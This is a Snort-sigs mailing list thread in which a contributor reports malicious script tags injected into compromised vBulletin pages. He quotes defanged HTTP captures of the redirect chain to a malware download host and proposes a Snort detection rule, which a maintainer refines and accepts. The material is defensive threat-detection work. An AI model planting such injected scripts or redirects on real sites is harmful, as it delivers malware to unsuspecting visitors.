[Snort-sigs] Compromised vBulletin sig

Matt Mickel mmickel at ...435...
Thu Apr 30 14:49:42 EDT 2015


Hi, James-

This rule has been reviewed and added to the community ruleset.  I 
removed the PCRE from the committed version and instead used the within 
content modifier.  This made the rule much more efficient while still 
detecting the relevant content.  Thanks so much for your submission.  
Cheers,

Matt Mickel

On 04/16/2015 01:30 PM, James Lay wrote:
> Didn't see this in any current ruleset, so I thought I'd post it here.
> Yesterday I saw two of these.  Injected into the vBulletin initial page:
>
> <script type="text/javascript"
> src="meow://meh[.]com/misc.php?v=364&js=js"></script>
> <script type="text/javascript"
> src="meow://bleh[.]com/forums/misc.php?v=420&js=js"></script>
>
>
> #######################################################################################
> GET /misc.php?v=364&js=js HTTP/1.1
> Accept: application/javascript, */*;q=0.8
> Referer:
> meow://meh[.]com/general-cooking/72226-kool-aid-bulk-purchases.html
> Accept-Language: en-US
> User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64;
> Trident/5.0)
> Accept-Encoding: gzip, deflate
> Host: meh.com
> Cookie: __cfduid=bleh; bbsessionhash=bleh; bblastvisit=1429113507;
> bblastactivity=0
> Cache-Control: max-stale=0
> Connection: Keep-Alive
> Pragma: no-cache
>
> HTTP/1.1 200 OK
> Date: Wed, 15 Apr 2015 15:58:25 GMT
> Content-Type: text/html; charset=ISO-8859-1
> Transfer-Encoding: chunked
> Connection: keep-alive
> Expires: 0
> Cache-Control: private, post-check=0, pre-check=0, max-age=0
> Pragma: no-cache
> Set-Cookie: bblastactivity=0; expires=Thu, 14-Apr-2016 15:58:27 GMT;
> path=/
> Set-Cookie: bblang_id=en; expires=Thu, 16-Apr-2015 01:58:27 GMT
> X-Powered-By: PleskLin
> Server: cloudflare-nginx
> CF-RAY: 1d78da121f59012e-SJC
> Content-Encoding: gzip
>
> document.location='meow://filestore72[.]info/download.php?id=f823cc00'
> #######################################################################################
>
> This in turn goes to:
>
> #######################################################################################
> GET /download.php?id=f823cc00 HTTP/1.1
> Accept: text/html, application/xhtml+xml, */*
> Referer:
> meow://meh[.]com/general-cooking/72226-kool-aid-bulk-purchases.html
> Accept-Language: en-US
> User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64;
> Trident/5.0)
> Accept-Encoding: gzip, deflate
> Host: filestore72[.]info
> Cache-Control: max-stale=0
> Connection: Keep-Alive
> Pragma: no-cache
>
> HTTP/1.1 302 Moved Temporarily
> Server: nginx/1.0.12
> Date: Wed, 15 Apr 2015 15:53:40 GMT
> Content-Type: text/html
> Content-Length: 161
> Connection: close
> Location:
> meow://pdta23sj9kkdl9wwtakzzhf.antalyagunlukkiralik[.]org/index.php?z=Z2xham91PWtuY2h2JnRpbWU9MTUwNDE1MTU0NTI1ODI3MDI4MSZzcmM9NzYmc3VybD1maWxlc3RvcmU3Mi5pbmZvJnNwb3J0PTgwJmtleT0yN0ExMzA0MSZzdXJpPS9kb3dubG9hZC5waHAlM2ZpZD1mODIzY2MwMA==
>
> <html>
> <head><title>302 Found</title></head>
> <body bgcolor="white">
> <center><h1>302 Found</h1></center>
> <hr><center>nginx/1.0.12</center>
> </body>
> </html>
> #######################################################################################
>
>
> Seems to be old-ish news, but the sig is below:
>
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS
> (msg:"SERVER-WEBAPP Compromised vbulletin site";
> flow:established,to_server; uricontent:"/misc.php?"; uricontent:"v=";
> uricontent:"js=js"; pcre:"/misc.php\x3Fv\x3D[0-9]{3}\x26js\x3Djs/Ui";
> reference:url,http://www.vbulletin.com/forum/forum/vbulletin-4/vbulletin-4-questions-problems-and-troubleshooting/4020207-please-help-hacked-vbulletin-redirect-to-filestore72-info;
> classtype:bad-unknown; sid:10000156; rev:1;)
>
> As usual, not sure if I have this perfect so anything to improve this
> sig would be excellent.  Thank you.
>
> James
>
> ------------------------------------------------------------------------------
> BPM Camp - Free Virtual Workshop May 6th at 10am PDT/1PM EDT
> Develop your own process in accordance with the BPMN 2 standard
> Learn Process modeling best practices with Bonita BPM through live exercises
> http://www.bonitasoft.com/be-part-of-it/events/bpm-camp-virtual- event?utm_
> source=Sourceforge_BPM_Camp_5_6_15&utm_medium=email&utm_campaign=VA_SF
> _______________________________________________
> Snort-sigs mailing list
> Snort-sigs at lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/snort-sigs
> http://www.snort.org
>
>
> Please visit http://blog.snort.org for the latest news about Snort!





More information about the Snort-sigs mailing list